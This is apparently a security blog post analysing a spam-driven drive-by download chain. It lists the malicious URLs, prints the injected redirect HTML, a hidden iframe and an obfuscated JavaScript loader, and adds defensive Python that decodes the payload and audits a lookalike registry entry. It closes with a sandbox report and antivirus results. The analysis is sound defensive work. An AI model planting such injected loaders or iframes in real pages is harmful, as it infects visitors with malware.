Buy Buy Exploitation
by Jose Nazario

We stumbled across a set of links recently via the MITRE Honeyclient, which we feed our spam URLs to. A handful of URLs that have been spammed out were triggered as malicious. Analysis shows that they are roughly the same basic injected code.
WARNING — LIVE EXPLOIT LINKS BELOW
Here’s the exploit chain, IFRAMEs and reloads.
http://flemminglind.dk/images/buybuy.html
-> http://numeralingenuity.com/
-> http://diettopseek.cn/in.cgi?cocacola
-> http://north-host.net/images/new/index.php
-> http://north-host.net//images/new/pdf.php
-> http://north-host.net//images/new/load.php
Google shows that a few sites look similar:
Results 1 – 8 of 8 for inurl:buybuy.html. (0.44 seconds)
That page, buybuy.html, directs you to a pharmacy site while also starting you down the exploit chain:
<meta http-equiv="refresh" content="0;url=http://numeralingenuity.com/" />
<html><body><iframe src="http://diettopseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe></body></html>
This IFRAME is getting some popularity too (some of these are malicious sites, some are discussions about it):
Results 1 – 9 of 9 for http://diettopseek.cn/in.cgi?cocacola. (0.37 seconds)
Now the content of that IFRAME, diettopseek.cn/in.cgi?cocacola:
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://north-host.net/images/new/index.php'">
#!/bin/sh
</head>
<body>
document moved <a href="http://north-host.net/images/new/index.php">here</a>
</body>
</html>
Now that new site, north-host.net/images/new/index.php, is some JavaScript that creates a new IFRAME:
<html><body><script>function gluerr(){return true;}window.onerror=gluerr;var
g="wQiSn+d+o+wQ.+e+vQaQlS";g=g.replace(/[\+u0SQ]/g,"");</script><style>.fU8TgEJnyVG3W{display:none;}</style><b
class="fU8TgEJnyVG3W" id="fU8TgEJnyVG3W">100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#34#60#105#102#114#97#109#101#32#115#114#99#61#39#104#116#116#112#58#47#47#110#111#114#116#104#45#104#111#115#116#46#110#101#116#47#47#105#109#97#103#101#115#47#110#101#119#47#112#100#102#46#112#104#112#39#32#119#105#100#116#104#61#49#32#104#101#105#103#104#116#61#49#32#102#114#97#109#101#98#111#114#100#101#114#61#48#62#60#47#105#102#114#97#109#101#62#34#41#59</b><script>var
Prototype=eval(g);var s=document.getElementById("fU8TgEJnyVG3W").innerHTML.replace(/[A-Za-z]/g,function (c){return String.fromCharCode((((c=c.charCodeAt(0))&223)-52)%26+(c&32)+65);}).split("#");var p="";for(var
i=0;i<s.length;i++){p+=String.fromCharCode(s[i]);}Prototype(p);</script></body></html>
This generates a bit of code (in the variable ‘p’) that reads:
document.write("<iframe src=\'http://north-host.net//images/new/pdf.php\' width=1 height=1 frameborder=0></iframe>");
and then evaluates it. Now you have an IFRAME to north-host.net//images/new/pdf.php, which itself is an exploit pack. You get to load.php on success, which drops an EXE on your box.
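As an added analyst-side example (not code from the post), here is a Python decoder that performs the same three steps statically, without ever evaluating the attacker's script: it strips the filter characters out of the string g to recover the eval target, applies the page's per-letter mapping (which turns out to be ROT13, a no-op for this sample since the hidden element holds only digits), and turns the '#'-joined char codes back into source. The sample HTML is a constructed copy of the index.php shown above with the extraction line breaks removed.

```python
import re

# Constructed sample: the obfuscated north-host.net index.php from the post,
# re-joined where the page extraction broke its lines. Decoding only; nothing
# in it is executed.
SAMPLE_HTML = (
    '<html><body><script>function gluerr(){return true;}window.onerror=gluerr;'
    'var g="wQiSn+d+o+wQ.+e+vQaQlS";g=g.replace(/[\\+u0SQ]/g,"");</script>'
    '<style>.fU8TgEJnyVG3W{display:none;}</style>'
    '<b class="fU8TgEJnyVG3W" id="fU8TgEJnyVG3W">'
    '100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#34#60#105#102#114'
    '#97#109#101#32#115#114#99#61#39#104#116#116#112#58#47#47#110#111#114#116#104'
    '#45#104#111#115#116#46#110#101#116#47#47#105#109#97#103#101#115#47#110#101'
    '#119#47#112#100#102#46#112#104#112#39#32#119#105#100#116#104#61#49#32#104#101'
    '#105#103#104#116#61#49#32#102#114#97#109#101#98#111#114#100#101#114#61#48#62'
    '#60#47#105#102#114#97#109#101#62#34#41#59</b>'
    '<script>/* decoder stage omitted */</script></body></html>'
)

def recover_eval_name(html):
    """Rebuild g the way the page's g.replace(/[...]/g,"") does."""
    m = re.search(r'var g="([^"]*)";g=g\.replace\(/(\[[^/]*\])/g,""\)', html)
    g, char_class = m.groups()
    return re.sub(char_class, '', g)  # Python accepts the same [\+u0SQ] class

def rot_letters(text):
    """The page's letter mapping ((c&223)-52)%26 + (c&32) + 65: ROT13 on
    A-Z/a-z. The sample payload contains no letters, so here it changes nothing."""
    return re.sub(r'[A-Za-z]',
                  lambda mo: chr(((ord(mo.group(0)) & 223) - 52) % 26
                                 + (ord(mo.group(0)) & 32) + 65), text)

def decode_payload(html):
    """Turn the hidden <b> element's '#'-joined char codes back into source."""
    m = re.search(r'<b class="([^"]+)"\s*id="\1">([^<]*)</b>', html)
    codes = rot_letters(m.group(2)).split('#')
    return ''.join(chr(int(c)) for c in codes)

def iframe_src(payload):
    """Pull the next-hop URL out of the decoded document.write() call."""
    m = re.search(r"src='([^']+)'", payload)
    return m.group(1) if m else None

if __name__ == '__main__':
    p = decode_payload(SAMPLE_HTML)
    print(recover_eval_name(SAMPLE_HTML), '->', p)
    print('next hop:', iframe_src(p))
```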
MD5: 79b7b2640ce97fa68487e9a2e42e2a0a
SHA1: b4fdd63605b3d126a0e8ad95f942d1c9a6714ec3
File type: application/x-ms-dos-executable
File size: 22016 bytes
Here’s a brief rundown of the file:
New Files
C:\Documents and Settings\Mal01\Desktop\digeste.dll
C:\WINDOWS\system32\digeste.dll
New Registry Key
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "" = msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digeste.dll
Network Activity
Connects to host 213.155.6.80 TCP port 80
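The persistence trick in that rundown is an extra entry in the SecurityProviders list, named to look like the legitimate digest.dll. As an added detection-side example (not code from the post), the following Python audits such a value against a baseline of known providers and flags entries that are unknown or nearly match a known name; the baseline set is an assumption and the sample value is constructed from the report above.

```python
# Assumed baseline of legitimate SecurityProviders entries on an XP-era host
# (the report's list minus the dropped one).
KNOWN_PROVIDERS = {"msapsspc.dll", "schannel.dll", "digest.dll", "msnsspc.dll"}

# Constructed sample: the registry value as the sandbox report shows it.
SAMPLE_VALUE = "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digeste.dll"

def levenshtein(a, b):
    """Plain edit distance, used to spot near-miss names like digeste.dll."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def audit_security_providers(value, known=KNOWN_PROVIDERS):
    """Return (unknown, lookalikes): entries outside the baseline, and for each
    of those the known provider it sits within two edits of, if any."""
    entries = [e.strip().lower() for e in value.split(",") if e.strip()]
    unknown = [e for e in entries if e not in known]
    lookalikes = {e: k for e in unknown for k in known if levenshtein(e, k) <= 2}
    return unknown, lookalikes

if __name__ == "__main__":
    unknown, lookalikes = audit_security_providers(SAMPLE_VALUE)
    for e in unknown:
        note = f" (resembles {lookalikes[e]})" if e in lookalikes else ""
        print(f"unexpected SecurityProvider: {e}{note}")
```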
It’s poorly recognized, both specifically and generally.
File load.php_id_92555_spl_5 received on 01.03.2009 22:07:54 (CET)
Antivirus / Version / Last Update / Result
a-squared 4.0.0.73 2009.01.03 -
AhnLab-V3 2008.12.31.0 2009.01.03 -
AntiVir 7.9.0.45 2009.01.03 -
Authentium 5.1.0.4 2009.01.03 -
Avast 4.8.1281.0 2009.01.03 -
AVG 8.0.0.199 2009.01.03 -
BitDefender 7.2 2009.01.03 -
CAT-QuickHeal 10.00 2009.01.03 -
ClamAV 0.94.1 2009.01.03 -
Comodo 869 2009.01.03 -
DrWeb 4.44.0.09170 2009.01.03 Trojan.Botnetlog.1
eTrust-Vet 31.6.6289 2009.01.02 -
Ewido 4.0 2008.12.31 -
F-Prot 4.4.4.56 2009.01.03 -
F-Secure 8.0.14470.0 2009.01.03 -
Fortinet 3.117.0.0 2009.01.03 -
GData 19 2009.01.03 -
Ikarus T3.1.1.45.0 2009.01.03 -
K7AntiVirus 7.10.575 2009.01.03 -
Kaspersky 7.0.0.125 2009.01.03 Trojan.Win32.Agent.bctg
McAfee 5483 2009.01.03 -
McAfee+Artemis 5483 2009.01.03 -
Microsoft 1.4205 2009.01.03 -
NOD32 3733 2009.01.02 -
Norman 5.80.02 2009.01.02 -
Panda 9.0.0.4 2009.01.03 -
PCTools 4.4.2.0 2009.01.03 -
Prevx1 V2 2009.01.03 Malicious Software
Rising 21.10.22.00 2008.12.31 -
SecureWeb-Gateway 6.7.6 2009.01.03 Win32.LooksLike.NewMalware
Sophos 4.37.0 2009.01.03 -
Sunbelt 3.2.1809.2 2008.12.22 -
Symantec 10 2009.01.03 -
TheHacker 6.3.1.4.204 2009.01.02 -
TrendMicro 8.700.0.1004 2009.01.02 -
VBA32 3.12.8.10 2009.01.03 -
ViRobot 2009.1.3.1541 2009.01.03 -
VirusBuster 4.5.11.0 2009.01.03 -
And that’s the kind of thing that’s been continuing for a while now. It would be nice to look more at the malware to discover what they’re up to.
We’ve experienced a lot of these attacks recently (most of them this morning). Via hacked ftp accounts all index.* files of at least 12 domains were infected with:
right after the tag.